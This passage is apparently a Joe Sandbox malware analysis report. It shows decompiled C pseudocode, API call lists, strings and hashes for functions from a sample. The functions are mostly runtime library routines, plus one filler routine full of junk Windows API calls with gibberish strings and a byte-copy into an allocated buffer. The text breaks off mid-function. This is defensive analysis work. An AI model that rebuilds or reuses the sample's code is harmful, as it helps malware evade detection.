Uniqueness

Uniqueness Score: -1.00%

Function 0040DC4E Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040DC4E() {
				void* _t1;

				_t1 = E0040DBDC(0); // executed
				return _t1;
			}

0x0040dc50
0x0040dc56

APIs

__encode_pointer.LIBCMT ref: 0040DC50

Part of subcall function 0040DBDC: TlsGetValue.KERNEL32(00000000,?,0040DC55,00000000,004171A4,005892B0,00000000,00000314,?,0040FAEA,005892B0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040DBEE
Part of subcall function 0040DBDC: TlsGetValue.KERNEL32(00000005,?,0040DC55,00000000,004171A4,005892B0,00000000,00000314,?,0040FAEA,005892B0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040DC05
Part of subcall function 0040DBDC: RtlEncodePointer.NTDLL(00000000,?,0040DC55,00000000,004171A4,005892B0,00000000,00000314,?,0040FAEA,005892B0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040DC43

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 4969261f5061704365dab4174235f7146d742500c55d146da6a57eb89e31a67a
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00405453 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405453() {
				void* _t1;

				_t1 = GlobalAlloc(0,  *0x588f80); // executed
				 *0x5838fc = _t1;
				return _t1;
			}

0x0040545b
0x00405461
0x00405466

APIs

GlobalAlloc.KERNELBASE(00000000,004054E5), ref: 0040545B

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 175c076e0ac82f8ee5407169409dadd0aff9c0ed96e46cdbc52e0097022909b3
Instruction ID: fb0f946ae68964290f7f9a106d21fa1be0c7b389ce261cb7ec09a57e1e71c6f6
Opcode Fuzzy Hash: 175c076e0ac82f8ee5407169409dadd0aff9c0ed96e46cdbc52e0097022909b3
Instruction Fuzzy Hash: 10B012700053008BCB000F50AC06B143A71F754702F441054FE40A0178DB300148BF00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004124FC Relevance: 66.4, APIs: 44, Instructions: 432
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004124FC(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E00411FE0(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E00411FE0(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E00411FE0(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E00411FE0(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E00411FE0(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E00411FE0(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E00411FE0(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E00411FE0(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E00411FE0(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E00411FE0(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E00411FE0(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E00411FE0(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E00411FE0(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E00411FE0(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E00411FE0(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E00411FE0(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E00411FE0(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E00411FE0(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E00411FE0(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E00411FE0(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E00411FE0(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E00411FE0(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E00411FE0(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E00411FE0(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E00411FE0(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E00411FE0(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E00411FE0(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E00411FE0(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E00411FE0(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00412504
0x00412508
0x0041250c
0x0041250f
0x00412514
0x0041251b
0x00412521
0x00412533
0x00412548
0x0041255d
0x00412572
0x0041258a
0x0041259f
0x004125b1
0x004125c6
0x004125de
0x004125f3
0x00412608
0x0041261d
0x00412635
0x0041264a
0x0041265f
0x00412674
0x0041268c
0x004126a1
0x004126b6
0x004126cb
0x004126e3
0x004126f8
0x0041270d
0x00412722
0x0041273a
0x0041274f
0x00412764
0x00412779
0x00412791
0x004127a6
0x004127bb
0x004127d0
0x004127eb
0x00412803
0x0041281b
0x00412833
0x0041284e
0x00412866
0x0041287e
0x00412896
0x004128b1
0x004128c9
0x004128e4
0x004128f7
0x00412901
0x0041290e
0x00412916
0x00412516
0x0041251a
0x0041251a

APIs

___getlocaleinfo.LIBCMT ref: 00412533
___getlocaleinfo.LIBCMT ref: 00412548
___getlocaleinfo.LIBCMT ref: 0041255D
___getlocaleinfo.LIBCMT ref: 00412572
___getlocaleinfo.LIBCMT ref: 0041258A
___getlocaleinfo.LIBCMT ref: 0041259F
___getlocaleinfo.LIBCMT ref: 004125B1
___getlocaleinfo.LIBCMT ref: 004125C6
___getlocaleinfo.LIBCMT ref: 004125DE
___getlocaleinfo.LIBCMT ref: 004125F3

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 67d2691e74c5941d2eb3c1619365f0b8b77928823da057a98be69eddb7686c32
Instruction ID: 990fea533c6ed410193014a0fb1ff9291efc675f3eb50e117d1a0606e3a22653
Opcode Fuzzy Hash: 67d2691e74c5941d2eb3c1619365f0b8b77928823da057a98be69eddb7686c32
Instruction Fuzzy Hash: 84E1DCB2A0020DBEEB11DBF18C81DFF77BDEB04788F15092AB215A2051EA74AB459764

Uniqueness

Uniqueness Score: -1.00%

Function 00405224 Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 99
filestringpipeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405224(intOrPtr _a4) {
				CHAR* _v8;
				long _v12;
				long _v16;
				struct _OSVERSIONINFOA _v164;
				struct _OSVERSIONINFOEXW _v448;
				char _v1472;
				char _v2496;
				void _v3520;
				char _v4544;
				intOrPtr _t16;

				E004084E0(0x11bc);
				if( *0x588f80 == 0x37) {
					CallNamedPipeA("Cokejizufo guhicotijeteme wadofiwa rozujotucixo", 0, 0,  &_v3520, 0,  &_v16, 0);
					GetThreadPriority(0);
					SearchPathA(0, 0, 0, 0,  &_v1472,  &_v8);
					OpenEventA(0, 0, "mugokateripayasojelihupurizarumi");
					FindResourceW(0, 0, 0);
					GetVersionExA( &_v164);
					SetWaitableTimer(0, 0, 0, 0, 0, 0);
					CopyFileW(0, 0, 0);
					WriteConsoleInputA(0, 0, 0,  &_v12);
					SizeofResource(0, 0);
					GlobalDeleteAtom(0);
					lstrlenW(L"Jefub");
					GetModuleHandleA(0);
					GetWindowsDirectoryA( &_v2496, 0);
					MapViewOfFileEx(0, 0, 0, 0, 0, 0);
					GlobalGetAtomNameA(0,  &_v4544, 0);
					DebugBreak();
					LocalUnlock(0);
					_push(0);
					VerifyVersionInfoW( &_v448, 0, 0);
				}
				_t16 = _a4;
				 *((char*)( *0x5838fc + _t16)) =  *((intOrPtr*)( *0x588f84 + _t16 + 0x38d6));
				return _t16;
			}

0x0040522c
0x00405238
0x00405255
0x0040525c
0x00405271
0x0040527e
0x00405287
0x00405294
0x004052a0
0x004052a9
0x004052b6
0x004052be
0x004052c5
0x004052d0
0x004052d7
0x004052e5
0x004052f1
0x00405300
0x00405306
0x0040530d
0x00405313
0x0040531d
0x00405323
0x00405324
0x0040533a
0x0040533e

APIs

CallNamedPipeA.KERNEL32(Cokejizufo guhicotijeteme wadofiwa rozujotucixo,00000000,00000000,?,00000000,?,00000000), ref: 00405255
GetThreadPriority.KERNEL32(00000000), ref: 0040525C
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00405271
OpenEventA.KERNEL32(00000000,00000000,mugokateripayasojelihupurizarumi), ref: 0040527E
FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 00405287
GetVersionExA.KERNEL32(?), ref: 00405294
SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004052A0
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 004052A9
WriteConsoleInputA.KERNEL32(00000000,00000000,00000000,?), ref: 004052B6
SizeofResource.KERNEL32(00000000,00000000), ref: 004052BE
GlobalDeleteAtom.KERNEL32 ref: 004052C5
lstrlenW.KERNEL32(Jefub), ref: 004052D0
GetModuleHandleA.KERNEL32(00000000), ref: 004052D7
GetWindowsDirectoryA.KERNEL32(?,00000000), ref: 004052E5
MapViewOfFileEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004052F1
GlobalGetAtomNameA.KERNEL32 ref: 00405300
DebugBreak.KERNEL32 ref: 00405306
LocalUnlock.KERNEL32(00000000), ref: 0040530D
VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 0040531D

Strings

Jefub, xrefs: 004052CB
mugokateripayasojelihupurizarumi, xrefs: 00405277
Cokejizufo guhicotijeteme wadofiwa rozujotucixo, xrefs: 00405250

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AtomFileGlobalResourceVersion$BreakCallConsoleCopyDebugDeleteDirectoryEventFindHandleInfoInputLocalModuleNameNamedOpenPathPipePrioritySearchSizeofThreadTimerUnlockVerifyViewWaitableWindowsWritelstrlen
String ID: Cokejizufo guhicotijeteme wadofiwa rozujotucixo$Jefub$mugokateripayasojelihupurizarumi
API String ID: 3795951309-3625322140
Opcode ID: ebc8b4d0c68ac744456d7a0e7200c09a68174984a35a494266cd778d7d05b6d1
Instruction ID: 67f5db39aa5df4ee65176f0c27e6e29ae3a6aa7c7a8f56d29e27dc29f0dd7039
Opcode Fuzzy Hash: ebc8b4d0c68ac744456d7a0e7200c09a68174984a35a494266cd778d7d05b6d1
Instruction Fuzzy Hash: 0C31D872402568BBD721ABA1AE4CDDF7F6CEF0A391B004066F64AE1520C7385685CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A40B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040A40B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4307fc; // 0xbd89b0be
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x589930 = _t6;
				 *0x58992c = _t22;
				 *0x589928 = _t25;
				 *0x589924 = _t21;
				 *0x589920 = _t27;
				 *0x58991c = _t26;
				 *0x589948 = ss;
				 *0x58993c = cs;
				 *0x589918 = ds;
				 *0x589914 = es;
				 *0x589910 = fs;
				 *0x58990c = gs;
				asm("pushfd");
				_pop( *0x589940);
				 *0x589934 =  *_t31;
				 *0x589938 = _v0;
				 *0x589944 =  &_a4;
				 *0x589880 = 0x10001;
				_t11 =  *0x589938; // 0x0
				 *0x589834 = _t11;
				 *0x589828 = 0xc0000409;
				 *0x58982c = 1;
				_t12 =  *0x4307fc; // 0xbd89b0be
				_v812 = _t12;
				_t13 =  *0x430800; // 0x42764f41
				_v808 = _t13;
				 *0x589878 = IsDebuggerPresent();
				_push(1);
				E0040F12C(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x40308c);
				if( *0x589878 == 0) {
					_push(1);
					E0040F12C(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040a40b
0x0040a40b
0x0040a40b
0x0040a40b
0x0040a40b
0x0040a40b
0x0040a40b
0x0040a411
0x0040a413
0x0040a413
0x00412401
0x00412406
0x0041240c
0x00412412
0x00412418
0x0041241e
0x00412424
0x0041242b
0x00412432
0x00412439
0x00412440
0x00412447
0x0041244e
0x0041244f
0x00412458
0x00412460
0x00412468
0x00412473
0x0041247d
0x00412482
0x00412487
0x00412491
0x0041249b
0x004124a0
0x004124a6
0x004124ab
0x004124b7
0x004124bc
0x004124be
0x004124c6
0x004124d1
0x004124de
0x004124e0
0x004124e2
0x004124e7
0x004124fb

APIs

IsDebuggerPresent.KERNEL32 ref: 004124B1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004124C6
UnhandledExceptionFilter.KERNEL32(0040308C), ref: 004124D1
GetCurrentProcess.KERNEL32(C0000409), ref: 004124ED
TerminateProcess.KERNEL32(00000000), ref: 004124F4

Strings

AOvB, xrefs: 004124A6

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: AOvB
API String ID: 2579439406-2560480373
Opcode ID: c20cde4acfc1a8236cf1851dcd65546ea404a70e0027afc166295048e70544e4
Instruction ID: 11e3e79694981a4de1d1310e8fcb621b5c759f100c898a8fc7de98499938c7fc
Opcode Fuzzy Hash: c20cde4acfc1a8236cf1851dcd65546ea404a70e0027afc166295048e70544e4
Instruction Fuzzy Hash: 6221D2B4402304DFD700EFA5ED846A47BA0FB68710F18606EED09B7270E7B85988EF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8B0 Relevance: 1.7, APIs: 1, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E0041A8B0(void* __ebx, void* __ecx, void* __edi) {
				void* _t180;
				void* _t183;
				void* _t236;

				_t236 = __edi;
				_t183 = __ecx;
				_t180 = __ebx;
				_push(cs);
			}

0x0041a8b0
0x0041a8b0
0x0041a8b0
0x0041a8b0

APIs

RaiseException.KERNEL32(C0000091,00000000,?,?), ref: 0041AA8A

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 407b6bbc0f667df8dc7e27d1f5d60638db660ff6d8a2ac7087232e9ba0987fcd
Instruction ID: d220673a5284e44978b7f96faf08b508a2b5f04cf6ea549abfb65174e7550c7e
Opcode Fuzzy Hash: 407b6bbc0f667df8dc7e27d1f5d60638db660ff6d8a2ac7087232e9ba0987fcd
Instruction Fuzzy Hash: 4FA19E71211609CFD718CF18C496AA57BA0FF04364F15869EE9DA8F2E1C738E9E1CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00410E4E Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410E4E() {

				SetUnhandledExceptionFilter(E00410E0C);
				return 0;
			}

0x00410e53
0x00410e5b

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010E0C), ref: 00410E53

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8b260c72ec6c02a8a187b7d61e67914e09fad261100421c17a6ce5d7bb74eddd
Instruction ID: ed232c427aac2de295471c2012691e7ebc086be7e9e5e5b1d1bd3058733b860b
Opcode Fuzzy Hash: 8b260c72ec6c02a8a187b7d61e67914e09fad261100421c17a6ce5d7bb74eddd
Instruction Fuzzy Hash: 139002743513044786041B715E0978526905A5CB127550861A101D8868EBA440905559

Uniqueness

Uniqueness Score: -1.00%

Function 00414A7C Relevance: .4, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00414A7C(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
